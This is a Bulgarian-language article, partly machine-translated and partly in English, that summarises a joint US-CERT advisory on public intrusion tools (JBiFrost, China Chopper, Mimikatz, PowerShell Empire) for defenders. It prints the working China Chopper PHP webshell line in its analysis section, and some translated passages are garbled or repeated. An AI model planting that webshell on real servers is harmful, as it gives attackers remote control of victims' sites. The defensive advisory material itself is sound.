US-CERT издаде доклад с описание на основни публично достъпни инструменти за кибернашествия

Докладът съдържа съвместно изследване от институциите за киберсигурност на пет държави: Австралия, Канада, Нова зенландия, UK и USA. [1][2][3][4][5]

Съдържанието му представя пет публично достъпни инструменти за кибернашествия, които се използват за зловредни действие при кибер инциденти в последните години:

  1. Remote Access Trojan: JBiFrost
  2. Webshell: China Chopper
  3. Credential Stealer: Mimikatz
  4. Lateral Movement Framework: PowerShell Empire
  5. C2 Obfuscation and Exfiltration: HUC Packet Transmitter

Целта на доклада е да подпомогне работата на екипите, които конструират защитата на мрежите и информационните системи. Предоставя и съвети за ограничаване на ефективността на тези Публично достъпни инструменти за кибернашествия и откриване на тяхното присъствие в мрежите.

Инструментите, които са анализирани в този доклад, са много малка част от огромния парк с различни други инструменти, използвани от злонамерените актьори на заплахите.

Тази уговорка е важна, за да не смятат засегнатите от подобни рискове, че с този списък се изчерпват планираните мерки за защитата на мрежата.

Публично достъпни инструменти за кибернашествия и техниките, които са предназначени за експлоатиране на мрежите и данните, които се съхраняват в тях, днес са достъпни за всички, които имат умението да си копират няколко файла от интернет и да боравят с тях в ролята на хакери. Независимо дали придобилите тези инструменти са представители на институции или престъпници, те могат да изпълзват пълната им функционалност без да притежават изключителни занания, умения и компетенции, каквито са имали хакерите създатели на тези инструменти. Предварителната подготовка за боравене с тези инструменти днес е тази, с която разполагат редовите потребители от цифровия свят.

Осигурени с разнообразни функции зловредните Публично достъпни инструменти за кибернашествия може да бъдат използвани от всички

  • квалифицирани тестери за проникване;
  • враждебни държавни актьори;
  • организирани престъпници;
  • самосиндикални кибер престъпници;
  • любители хакери.

Инструментите, които са анализирани в този документ, са използвани за компрометиране на мрежи и информационни системи в широк спектър от критични сектори, включително здравеопазване, финанси, правителство и отбрана. Широкото им разпространение представлява предизвикателство за защитата на мрежите и противопоставянето на актьорите на заплахите.

Какво показва опитът от представяното проучване. То е направено чрез обединие на капацитета на водещи световни икономически и технологични сили на страните участнички.

Въпреки че участниците в кибернетичната заплаха продължават да развиват своите възможности, те все още използват въпросните инструменти и техники.

Дори най-сложните атаки на групи участници в заплахите използват общи, публично достъпни инструменти за постигане на техните цели

Каквито и да са тези цели, първоначалното проникване в системите на жертвите често става чрез използване на общи слабости в сигурността. Злоупотребата с незакърпени софтуерни уязвимости или с лошо конфигурирани системи са често срещани подходи на актьорите на заплахите. Инструментите, описани подробно в този доклад влизат в действие  след като бъде компрометирана мрежата или информационната система. Това позволява на атакуващите да постигнат целите си в системите на жертвата. Целите обикновено с аизточване на лични данни, на корпоративно ноу-хау. По рядко се стига до унищожаване на дданни или цели системи.

Независимо от целите на атакуващите, инициализацията н аатаката най-редовно става през добре познати и известни уязвимости в операционните системи, машините за обработване на бази данни, мрежовите устройства и приложенията.

Как се използва доклада на US-CERT за Публично достъпни инструменти за кибернашествия

Инструментите, които се обсъждат в доклада попадат в пет различни категории.

Remote Access Trojans (RATs);

webshells;

credential stealers;

lateral movement frameworks;

and command and control (C2) obfuscators.

Представен е преглед на заплахите, които всеки от инструментите предполага. Припомнят се реални инциденти с вътрешни подробности кога, къде и по какъв начин е овеществена заплахата с всеки от инструментите. Дава отговор как да се подходи за откриване на итструмента, след като е инсталиран в компрометирана система и възможностите му за нанасяне на ефективни вреди. Представени са и мерки за повишаване на защитните възможности на мрежите на базата на добри практики.

Технически детайли

Remote Access Trojan: JBiFrost

За първи път е наблюдаван през май 2015 г. JBiFrost RAT е вариант на RAT, който от своя страна произлица или е модификация на Frutas RAT 2012.

RAT е програма, която след като бъде инсталирана на машината на жертвата дава възможност за отдалечено администриране.  Списъкът на услугите, които злосторниците получават след скритото инсталиране на такъв тип програма включва:

отдалечено конфигуриране и преконфигуриране на операционната система и проложенията;

инсталиране, активиране и спиране, както и деинсталиране на програми за

  • записване през микрофона на машината;
  • филмиране през камерата;
  • записване на всички натиснати клавиши – чрез keylogger;
  • копиране на данни;
  • изпращане на снимки на екрана към отдалечени машини или имейл адреси дори.

Зловредните RAT са трудни за откриване. Създателите им са ги направили невидими. Те не излизат в списъка на активните приложения, които се листват когата ги гледаме през Task Manager във Windows или Application Manager в Android..

За да предотвратят откриването си RAT изключват мерките за сигурност в операционните системи.

Начин на употреба

JBiFrost RAT се използва от кибер криминали и други актьори на заплахите, които имат слаба подготовка в областта на хакерството. Възможностите на ези инструменти лесно воже да влязат в работа и на институционално организирани актьори на заплахите.

Други, по-рафинирани RAT се използват за реализиране на постоянно невидимо присъствие (Advanced Persistent Threat, APT)) в мрежите и информационните системи на жертвите. Такива са примерите с:

  • Adwind RAT, използван срещу структури от въздухоплаването и отбраната;
  • Quasar RAT, by APT10, срещу организации от широк спектър от индустриални сектори.

Целта на инструментите за постоянно невидимо присъствие обикновено е постоянно изнасяне на ценна информация, например пълномощия за банкови акаунти, индустриално ноухау или лични данни.

Възможности

JBiFrost RAT е базиран на Java, кросплатформен и мултифункционален. Заплашва Windows, Linux, MAC OS X и Android.

JBiFrost RAT позволява на актьорите на заплаха да да се придвижват между хостовете като завладяват нови територии от мрежата или да инсталират допълнителен злонамерен софтуер. Той се предава основно чрез:

  • имейли;
  • прикачен файл;
  • обикновено известие за фактура;
  • заявка за котировка;
  • уведомление за превод;
  • уведомление за изпращане;
  • известие за плащане;
  • или с връзка към услуга за хостване на файлове.

Но това още не е всичко

Както се казва в рекламата. След като веднъж завладяната територия е употребена и инфекциите са извлекли интелектуална собственост, банкови данни и лична идентификационна информация (PII) следва втори начин на употреба. Машините, заразени с JBiFrost RAT, могат да се използват и в ботнетите за извършване на разпределени атаки на отказ от обслужване DDoS.

Примери за атаки с Публично достъпни инструменти за кибернашествия

В началото на 2018 се наблюдава нарастване на използването на JBiFrost RAT в атаки срещу организации, които имат за предмет критична национална инфраструктура в САЩ и операторите от техните вериги за доставки.

През 2017, Adwind RAT е инсталиран в широк  спектъп платформи през лъжливи имейли. За целта имейлите са изглеждали създадени и изпратени от Society for Worldwide Interbank Financial Telecommunication, SWIFT, организация, която предлага специализирани мрежови услуги за финансови институции.

Много други версии на различни RAT, включително варианти на Gh0st RAT, са наблюдавани срущу голямо количество цели по света.

Откриване и защита на Публично достъпни инструменти за кибернашествия

Някои от индикациите за наличие на инфекция с JBiFrost RAT:

Невъзможност за рестартиране на компютъра в безопасен режим Safe mode;
Невъзможността за отваряне на редактора на системния регистър на Windows или на диспечера на задачите Task manager;
Значително увеличаване на дисковата активност или мрежовия трафик;
Наблюдават се опити за свързване със злонамерени IP адреси по различни протоколи;
Създаване на нови файлове и директории с мъгливи, странни  случайни имена.
Защитата се осигурява най-добре, като се гарантира, че системите и инсталираните приложения са напълно защитени чрез подходящи конфигурации и актуализирани с ъпдейти по сигурността. Използването на съвременна антивирусна програма с автоматично актуализиране на дефинициите и редовни системни сканирания също ще помогне да се гарантира, че повечето от най-новите варианти на RAT ще бъдат спрени.

За да се предотврати появата на инфекции, се препоръчва стриктно включване на механизма бял списък

Той съдържа имената на приложенията, за които е разрашено да работят в платформата.

Първоначалният механизъм за инфектиране за RAT, включително JBiFrost RAT, може да бъде чрез фишинг имейли. Можете да предотвратите появата на инфекции, причинени от JBiFrost RAT, като престанете да достигате до потребителите си, като помагате на потребителите да идентифицират и докладват имейли за фишинг и да въвеждат контроли за сигурност, така че зловредният имейл да не компрометира вашето устройство. Националният център за кибернетична сигурност в Обединеното кралство (United Kingdom National Cyber Security Centre, UK NCSC) публикува насоки за фишинг.

Webshell: Китайски хеликоптер
Китайски хеликоптер е публично достъпен уебшел. Добре документиран, широко използван от 2012 г. насам.

Webshells са злонамерени скриптове, които се качват в целеви хост след първоначален компромис и предоставят на отдалечен административен капацитет за осъществяване на атака и реализиране на заплаха.

След като този достъп бъде установен, webshells могат да бъдат използвани за овладяване на следващи хостове в рамките на мрежата.

Webshell: China Chopper

China Chopper е публично достъпен, добре документиран webshell. Разпространен е широко от 2012 г.

Зловредните софтуерни приложения от типа Webshell се копират чрез непозволени способи в платформата, която е цел на атаката. След този момент хостът е компрометиран. Тогава злонамерения актьор има възможност да упражнява права на администратор върху ресурсите му. Най неприятната вест в този случай е възможността на злонамерените актьори да използват този хост за плацдарм. За да окупират останалите платформи от мрежата, в която са попаднали. От гледна точка на крайния потребител China Chopper е приложение с графичен интерфейс и менюта. Заедно с приличната документация това го прави достъпен дори за неизкушени потребители, камо ли за хакери.

Употреба на Публично достъпни инструменти за кибернашествия

China Chopper се използва интензивно от актьорите на заплахите за отдалечен достъп до овладени компютри с компрометирани уеб сървъри. Така зломишлениците могат да управляват файлове и директории, имат достъп до платформата чрез виртуален терминал.

Големината на China Chopper е само 4 KB и лесно се използва за да пренася товари, трудно се открива поради големината на файла и не е лесен за деактивиране.

Какви може да бъдат товарите? Най често зловредни приложения, които се инсталират с помощта на webshell. Може да са:

  • агенти за причиняване на отказ на услуга;
  • разппространяване на софтуер за добиване на биткоини без знанието на потребителя;
  • приложения за ransomware, които криптират данните и издават съобщение с искане за откуп и много други.
Възможности на China Chopper

В генеричния и този случай webshell се състоят от две части – клиент с графичен интерфейс (caidao.exe) и малко парче код върху компрометирания уеб сървър.

Опасен е защото е труден за откриване

Файлът, който се поставя в копрометирания уеб сървър в някои случаи с PHP е следния.

<?php @eval($_POST[‘password’]);?>

Логиката за функционирането му е делегирана на клиента caidao.exe.

Той комуникира директно с файла, който е поставен в уеб сървъра и доставя множество интересни възможности например:

  • File explorer;
  • DataBase client;
  • interactive command shell;
  • “Security Scan” полезен при брутално тестване за откриване н апароли за досъп до уеб портали.

Хешът на клиента по MD5 е публично достъпен (оригинално публикуван на hxxp://www.maicaidao.com).

Table 1: China Chopper webshell client MD5 hash

Webshell ClientMD5 Hash
caidao.exe5001ef50c7e869253a7c152a638eab8a

Сървърът на webshell (малкото парче код на PHP) се копира в компрометирания уеб сървър. След това може лесно да бъде променян от атакуващия. Това усложнява дефинирането на специфичен хеш, който всеки път да помага в откриването на зловредна активност с този инструент.

През лятото на 2018 г. актьорите на заплахите се насочват към уеб сървъри, които са уязвими за CVE-2017-3066. Активността им е свързана с уязвимост в платформата за разработване на уеб приложения Adobe ColdFusion. Тя дава възможност за отдалечено изпълнение н апрограмен код (remote code execution).

China Chopper е предназначен за второстепенен полезен товар, доставен, след като сървърите вече са били компрометирани.  Позволява на актьора на заплахата отдалечен достъп до хоста на жертвата. След успешното използване на уязвимост на машината на жертвата, стрингът с China Chopper се доставя в директориите на уеб сървъра. След като бъде копиран там, сървърът на WebShell може да бъде достъпен от актьорите на заплахата по всяко време чрез използване на клиентското приложение. След успешното свързване, атакуващият  продължава да манипулира файлове и данни на уеб сървъра, естествено в свой интерес.

Възможностите на China Chopper включват:

  • копиране на файлове от и към жертвата чрез инструмента wget;
  • за копиране на файлове от интернет към целта;
  • редактиране, изтриване, копиране, преименуване и дори промяна на времевите маркери на съществуващи файлове.
Откриване и защита

За да бъдат открити webshells навреме, защитата сайта трябва да се съсредоточи върху откриването на подозрителни процеси в уеб сървъра. Например активиране на процеси, които се инициализират с функции от препроцесора за хепертекст, най често PHP. (Hypertext Preprocessor [PHP]) и изходящите мрежови връзки от уеб сървъри. Обикновено уеб сървърите допускат  предвидими връзки към вътрешна мрежа. Промените в тези модели може да показват наличието на използвене на webshell. Чрез управление на пълномощията се забранява на процесите в уеб сървърите да записват файлове в директории, в които може да се изпълнява програмен код на PHP или да се променят съществуващи файлове.

Професионалният подход изисква използване на регистрационни файлове за достъпа до уеб сайта (журнали, тоест syslog). Те са източник за мониторинг, анализиране на трафика, откриване на промени в уеб страниците или аномалии в трафика. Да речем че те са перфектни ранни индикатори.

Най-мощната защита срещу webshell е да се избегне компрометирането на уеб сървъра на първо място. Най-напред е необходимо всички софтуерни артефакти, които работят в инфраструктурата на сайта:

  • уеб сървър;
  • машини за бази данни;
  • интерпретатори на езици запрограмиране;
  • библиотеки с програмен код;
  • проксита;
  • са актуализирани с последните си поправки по сигурността.

Следващата стъпка, която е необходимо да се следва е

Одит на персонализирани приложения за често срещани уеб уязвимости [6].

Характерен атрибут на China Chopper е голямото количество обръщения към сайта такива, че всяко действие генерира протокол за пренос на хипертекст (HTTP) POST. Това е трафична аномалия и аномалия в поведението на крайния потребител. Тя лесно се забелязва и регистрира при мониторинг на журналите (syslog). Стига да  бъдат проучени с автоватизирани инсрументи или ръчно от защитник на мрежата.

Копирането на WebShell, в случая анализирания China Chopper става с прехвърляне през мрежата на обикновен текст. Командите, издадени от клиента, са кодирани с Base64, въпреки че това е лесно за декодиране. Приемането и разпространяването на TLS (Security Layer Security) от уеб сървърите доведе до криптиране на трафика в уеб сървърите. Това прави разкриването на дейността на China Chopper с използване на мрежови инструменти по-трудно.

Най-ефективният начин за откриване и смекчаване на Китайския хеликоптер (China Chopper) е да се подходи откъм самия хост, където домува уеб сървъра. Съществуват лесни начини за търсене на присъствието на уеб шела (China Chopper) като се използва командния ред на операционните системи Linux и Windows. [7]

За да се се осигури защита на уеб сайтовете от този клас посегателство,

защитниците на мрежата трябва да се съсредоточат върху откриването на подозрително изпълнение на уеб сървъри (напр. Процеси на възникване на хакери на Hypertext Preprocessor [PHP]) и извънходящи мрежови връзки от уеб сървъри. Обикновено уеб сървърите правят предвидими връзки към вътрешна мрежа. Промените в тези модели може да показват наличието на уеб черупка. Можете да управлявате разрешенията на мрежата, за да не позволите на процесите в уеб сървърите да пишат в директории, в които може да се изпълнява PHP или да променят съществуващи файлове.

Също така ви препоръчваме да използвате регистрационни файлове за уеб достъп като източник на мониторинг, като например чрез трафик анализи. Неочакваните страници или промените в трафика могат да бъдат ранни индикатори.

Блокиране на Webshell

Експлоита webshell се използва само на сървъри с уязвимости на уеб приложения или слобости в конфигурационните параметри на уеб сървъра. Идентифицирането и закриването на такива уязвимости е от решаващо значение за избягване на компрометирането на сайта. За сървъри, поддържащи PHP, потенциално опасни функции са exec (), shell_exec (), eval (), assert () и т.н. Те трябва да бъдат забранени в php.ini. Това прави трудно изпълнението на скрипта от webhell. Дори и да бъде копиран в директориите на уеб сървъра, при тази забрана няма как да бъде активиран. Също така чувствителните директории, като например тези с графика или допускащи копиране (upload),  трябва да бъдат деактивирани или имената им да бъдат променени от състоянието им по подразбиране. Уеб приложенията с функции за качване (upload) на файлове трябва да бъдат защитени и да позволяват качването на файлове само от бял списък. В случай на CMS, като WordPress, плъгини от трети страни, които не са необходими, трябва да бъдат деактивирани.

Ютилизиране на WEBSHELL

Продължителен отдалечен достъп

WEBSHELL обикновено съдържа задна вратичка, която позволява на атакуващия да получава отдалечен достъп и евентуално да управлява услуги в собствен интерес, по същество сървър намиращ се в същия сървър, по всяко време. Това спестява на атакуващия неудобството, че трябва да използва уязвимост всеки път, когато се изисква достъп до компрометирания сървър.

Нападателят може също така да реши да преустанови самата уязвимост, за да се гарантира, че никой друг няма да я използва. По този начин нападателят може да стане още по-незабележим и да избегне разкриване, а получава същия резултат.

Заслужава да се отбележи също така, че няколко популярни модела на webshell използват удостоверяване чрез представяне н апълномощия – пароли и други техники, за да се гарантира, че само хакерът, който го управлява, има достъп до него. Такива техники включват заключване на скрипта на специфичен персонализиран HTTP хедър, специфични стойности на “бисквитки”, специфични IP адреси или комбинация от тези техники. Повечето webshel съдържат и код за идентифициране и блокиране на търсещите машини от заложен в тях списък, а заедно с това и черен списък на домейна или сървъра, на който се хоства уеб приложението. Така ключалката е неоткриваема и достъпна дори за домакините.

Ескалиране на привилегиите

Освен ако сървърът не е конфигуриран погрешно, webshell ще работи с правата за достъп на потребителя, от името на който е активиран уеб сървъра. Последните са, или поне трябва да бъдат ограничени. Използвайки webshell нападателят може да се опита да извърши атаки за ескалация на привилегии, като използва локалните уязвимости в системата, за да овладее праната на супер потребител (root) в Linux и други операционни системи, базирани на UNIX.

С достъп до коренния акаунт (root) нападателят може по същество да направи каквото си поиска в операционната система. Включително инсталиране на софтуер, промяна на разрешения, добавяне и премахване на потребители, кражба на пароли, четене на имейли и др.

Разширяване на успеха и инициализиране на нови атаки

webshell може да се използва за проучване и превземане на останалите системи вътре или извън корпоративната мрежа. Нападателят може да иска да трасира и проверява мрежовия трафик като сканира вътрешната мрежа, за да открива живи хостове и да регистрира и оцени защитните стени и маршрутизаторите в мрежата.

Този процес може да отнеме дни, дори месеци, предимно защото нападателят обикновено се стреми да поддържа невидим, прозрачен за защитниците профил и да привлече възможно най-малко внимание. След като нападателят има постоянен достъп, той може търпеливо да направи следващите си ходове.

Компрометираната система може да се използва и за атака или сканиране на цели, разположени извън мрежата. Това добавя допълнителен слой “анонимност” към нападателя, тъй като използва система от трета страна, за да започне атака. Една стъпка напред би била да се конструира “тунел” през множество системи, за да стане почти невъзможно да се проследи атаката обратно към нейния източник.

Забележително е, че когато има пълни права, такъв нападател има условия да прикрива следите си.

Zombie

Друга употреба на web-shells е за създаване на сървърите, чрез които се управлява ботнет. Ботнетът е мрежа от компрометирани системи, които един нападател би могъл да

  • контролира;
  • използва за собствени целии;
  • или да отдаде под наем на други престъпници.

Уеб-обвивката (webshell) или задната вратичка се свързва със сървър за контрол и управление (C&C), от който може да приема команди от оператора си и да изпълнява инструкции върху хиляди машини, чрез webshell.

Тази настройка обикновено се използва в атаки от типа разпределен отказ на услуга (DDoS), които изискват широки честотни ленти. В този случай, нападателят няма за цел да навреди или да открадне нещо от системата, върху която е разположен webshell. Вместо това нападателят използва ресурсите му за обмен по мрежовите интерфейси за да изпрати некоректно количество заявки към отдалечен хост, когато е необходимо.

Кражба ва потребителски акаунти с Mimikatz

Mimikatz е разработена през 2007 г.. Използва се от зломишлени актьори за събиране на пълномощията (потребителските имена и паролите) на други потребители, които са влезли в целевата машина с Windows. Това става чрез достъп до идентификационните данни в паметта в рамките на процеса на Windows, наречен Local Security Authority Subsystem Service (LSASS).

Тези идентификационни данни, както в обикновен текст, така и в хеширана форма, могат да бъдат използвани отново, за да се осигури достъп до други машини в мрежата.

Въпреки че първоначално не е бил предназначен като хакерски инструмент, през последните години Mimikatz е бил използван от множество актьори за злонамерени цели. Използването му в от хакери за различни атаки по света постави пред организициите в световен мащаб да задача да преосмислят своите мрежови защити.

Mimikatz обикновено се използва от актьорите на заплаха, след като достъпът до хост от вътрешната мрежа е постигнат и нашественикът иска да се движи във вътрешната мрежа. Неговото използване може значително да подкопае лошо конфигурирана мрежова сигурност.

Начин на употреба

Програмния код на Mimikatz е публично достъпен. Това означава, че всеки може да го вземе и да го промени. За да компилира своя собствена версия или да създаде разширение (plug-in) с добавена нова функционалност.

Съществуват множество доклади за използване на Mimikatz от различни актьори на заплахите включително организирани престъпни групи и такива спонсорирани от правителства.

След кото актьорът на заплахата плучи пълни привилегии върху даден хост, той може да си осигури пълномощията на останалите потребители, тъй като Mimikatz поддръжа функции за откриване на  хешовете и паролите в чист текст. Това вече е заход към следващият етап от атаката, през който зломишлиникът ескалира привилегиите си в средата на домейна и изпълнява множество задачи, които са характерни за етапа след проникването. Важната функия която си осигурява е възможността да се премества в останарите платформи. нарича се странично движение (Lateral Movement).

Поради тези причини Mimikatz се окомплектова с други инструменти ца проникване (penetration testing) и сюити за експлоатация на уязвимости, например PowerShell Empire и Metasploit.

Способности

Mimikatz е най-известен със своята способност да извлича ясни текстови идентификационни данни пороли и потребителски имена) и хешове от оперативната памет, а пълният му набор от възможности е обширен. Инструментът може да получи хешове, сертификати и дългосрочни ключове на локална мрежа и NT LAN Manager в Windows XP (2003) чрез Windows 8.1 (2012r2). В допълнение, той може да изпълнява pass-the-hash или pass-the-ticket задачи и да изгражда „златни билети“ на Kerberos. Много от функциите на Mimikatz могат да бъдат автоматизирани със скриптове, като PowerShell, което позволява на зловредния актьор бързо да използва и пресича (преминава, извършва Lateral Movement) през компрометирана мрежа. Освен това, когато работи в паметта чрез свободно достъпния PowerShell скрипт „Invoke-Mimikatz“, дейността на Mimikatz е много трудна за изолиране и идентифициране.

Примери за възможностите на Mimikatz

Примерите, в които Mimikatz са били използвани в множество инциденти от широк кръг от участници в заплахите в продължение на няколко години. През 2011 г. тя е била използвана от неизвестни участници в заплахата, за да получи административни пълномощия от холандския сертифициращ орган, DigiNotar. Бързата загуба на доверие в DigiNotar доведе до фалита на компанията в рамките на един месец след този компромис.

Mimikatz беше използван заедно с други злонамерени инструменти – в рандомизаторите NotPetya и BadRabbit през 2017 г., за да извлекат администраторски пълномощия от хиляди компютри. Тези идентификационни данни бяха използвани, за да улеснят страничното движение и дадоха възможност на рансъмуерът да се разпространява в мрежи, криптирайки твърдите дискове на многобройни системи, където тези пълномощия бяха валидни.

Изследователи то Microsoft изентифицират действията на Mimikatz при протичането на софистична кибератака нацелена срещу викосотехнологични и финансови организации. В комбинация с няколко други инструмента и експлоатирани уязвимости, Mimikatz беше използван за източване (dump) и вероятно повторно използване на системните хешове.

Откриване и защита

Актуализирането на Windows ще помогне за намаляване на информацията, достъпна за актьорите на заплахите чрез инструмента Mimikatz, тъй като Microsoft се стреми да подобри защитата, предлагана във всяка нова версия на Windows.

За да се предотврати извличането на идентификационни данни от Mimikatz, защитниците на мрежата трябва да забранят съхранението на пароли с ясен текст в паметта LSASS. Това е поведението по подразбиране за Windows 8.1 и Windows Server 2012 R2 и следващите им версии, но важи и за по-стари системи, на които са инсталирани съответните кръпки за сигурност. [8] Системите на Windows 10 и Windows Server 2016 могат да бъдат защитени чрез използване на по-нови функции за защита, като например Credential Guard. Credential Guard  е включен по подразбиране ако хардуерът отговаря на спецификациите и политиките на Windows за хардуерната съвместимост на Windows за Windows Server 2016 и Windows Server Semi-Annual Branch и сървърът не действа като контролер на домейни. Трябва да проверите дали физическите и виртуализираните сървъри отговарят на ;минималните изисквания за всяко издание на Windows 10 и Windows Server.

Повторното използване на пароли в профилите, по-специално администраторските, прави атаките с pass-the-hash далеч по-прости. Трябва да ie зададат потребителски правила в организацията, които да възпрепятстват повторното използване на пароли, дори и в общодостъпни профили в мрежа. Свободно достъпното софтуерно приложение и решение за управление на локални администраторски пароли от Microsoft може да позволи лесно управление на паролите на местните администратори, като предотвратява необходимостта от ръчно задаване и съхраняване на пароли.

Мрежовите администратори трябва да наблюдават и да отговарят на необичайно или неоторизирано създаване или удостоверяване на акаунт, за да предотвратят използването на билети на Kerberos (Utilizing Kerberos tickets) или осигурено постоянно присъствие в  мрежата, както и странично движение (Lateral Movement).

За Windows може да помогнат инструменти като Microsoft Advanced Threat Analytics и Azure Advanced Threat Protection. Администраторите на мрежата трябва да гарантират, че системите са поправени и актуализирани. Въздействията на многобройни функции на Mimikatz са смекчени или значително ограничени от най-новите версии и актуализации на операционната система. Но никаква актуализация не е перфектно решение, тъй като Mimikatz непрекъснато се развива и често се разработват нови модули на трети страни.

Повечето актуални антивирусни инструменти ще открият и изолират стандартната версия на Mimikatz, която не е модифицирана.  Следователно трябва да се използват за откриване на тези случаи. Но участниците в заплахите понякога могат да заобикалят антивирусните системи, като пуснат Mimikatz да работи само в паметта, без да оставя следи по файловите системи, или леко да променят оригиналния код на инструмента. Където и да се открие Mimikatz, трябва да се извърши строго разследване, тъй като почти сигурно показва, че актьорът на заплахата е активно присъстващ в мрежата, а не се наблюдава автоматизиран процес на работа. Няколко функции на Mimikatz разчитат на използването на администраторски акаунти. Затова трябва да се контролират администраторските акаунти и да се издават само при необходимост. Когато се изисква административен достъп, трябва да се приложат принципите за управление на привилегирован достъп. Тъй като Mimikatz може да улавя профилите само на тези потребители, които са влезли в компрометирана машина, привилегированите потребители (напр. Администраторите на домейни) трябва да избягват да влизат в машини с техните привилегировани идентификационни данни, освен по необходимост.

Детайли за гарантиране на сигурността в Active Directory са достъпни на сайта на Microsoft.[9]

Мрежовите защитници следва да проверяват използването на скриптове, особено PowerShell, и да инспектират журналите, за да идентифицират аномалии. Това ще спомогне за идентифициране на Mimikatz или злоупотреба с хешовете (pass-the-hash abuse), както и за осигуряване на някои смекчаващи мерки срещу опитите за заобикаляне на софтуера за откриване на вредоносни програми.

Lateral Movement Framework: PowerShell Empire

PowerShell Empire is an example of a post-exploitation or lateral movement tool. It is designed to allow an attacker (or penetration tester) to move around a network after gaining initial access. Other examples of these tools include Cobalt Strike and Metasploit. PowerShell Empire can also be used to generate malicious documents and executables for social engineering access to networks.

The PowerShell Empire framework was designed as a legitimate penetration testing tool in 2015. PowerShell Empire acts as a framework for continued exploitation once a threat actor has gained access to a system.

The tool provides a threat actor with the ability to escalate privileges, harvest credentials, exfiltrate information, and move laterally across a network. These capabilities make it a powerful exploitation tool. Because it is built on a common legitimate application (PowerShell) and can operate almost entirely in memory, PowerShell Empire can be difficult to detect on a network using traditional antivirus tools.

In Use

PowerShell Empire has become increasingly popular among hostile state actors and organized criminals. In recent years we have seen it used in cyber incidents globally across a wide range of sectors.

Initial exploitation methods vary between compromises, and threat actors can configure the PowerShell Empire uniquely for each scenario and target. This, in combination with the wide range of skill and intent within the PowerShell Empire user community, means that the ease of detection will vary. Nonetheless, having a greater understanding and awareness of this tool is a step forward in defending against its use by threat actors.

Capabilities

PowerShell Empire enables a threat actor to carry out a range of actions on a victim’s machine and implements the ability to run PowerShell scripts without needing powershell.exe to be present on the system Its communications are encrypted and its architecture is flexible.

PowerShell Empire uses “modules” to perform more specific malicious actions. These modules provide the threat actor with a customizable range of options to pursue their goals on the victim’s systems. These goals include escalation of privileges, credential harvesting, host enumeration, keylogging, and the ability to move laterally across a network.

PowerShell Empire’s ease of use, flexible configuration, and ability to evade detection make it a popular choice for threat actors of varying abilities.

Examples

During an incident in February 2018, a UK energy sector company was compromised by an unknown threat actor. This compromise was detected through PowerShell Empire beaconing activity using the tool’s default profile settings. Weak credentials on one of the victim’s administrator accounts are believed to have provided the threat actor with initial access to the network.

In early 2018, an unknown threat actor used Winter Olympics-themed socially engineered emails and malicious attachments in a spear-phishing campaign targeting several South Korean organizations. This attack had an additional layer of sophistication, making use of Invoke-PSImage, a stenographic tool that will encode any PowerShell script into an image.

In December 2017, APT19 targeted a multinational law firm with a phishing campaign. APT19 used obfuscated PowerShell macros embedded within Microsoft Word documents generated by PowerShell Empire.

Our cybersecurity authorities are also aware of PowerShell Empire being used to target academia. In one reported instance, a threat actor attempted to use PowerShell Empire to gain persistence using a Windows Management Instrumentation event consumer. However, in this instance, the PowerShell Empire agent was unsuccessful in establishing network connections due to the HTTP connections being blocked by a local security appliance.

Detection and Protection

Identifying malicious PowerShell activity can be difficult due to the prevalence of legitimate PowerShell activity on hosts and the increased use of PowerShell in maintaining a corporate environment.

To identify potentially malicious scripts, PowerShell activity should be comprehensively logged. This should include script block logging and PowerShell transcripts.

Older versions of PowerShell should be removed from environments to ensure that they cannot be used to circumvent additional logging and controls added in more recent versions of PowerShell. This page provides a good summary of PowerShell security practices.[10]

The code integrity features in recent versions of Windows can be used to limit the functionality of PowerShell, preventing or hampering malicious PowerShell in the event of a successful intrusion.

A combination of script code signing, application whitelisting, and constrained language mode will prevent or limit the effect of malicious PowerShell in the event of a successful intrusion. These controls will also impact legitimate PowerShell scripts and it is strongly advised that they be thoroughly tested before deployment.

When organizations profile their PowerShell usage, they often find it is only used legitimately by a small number of technical staff. Establishing the extent of this legitimate activity will make it easier to monitor and investigate suspicious or unexpected PowerShell usage elsewhere on the network.

C2 Obfuscation and Exfiltration: HUC Packet Transmitter

Hits: 70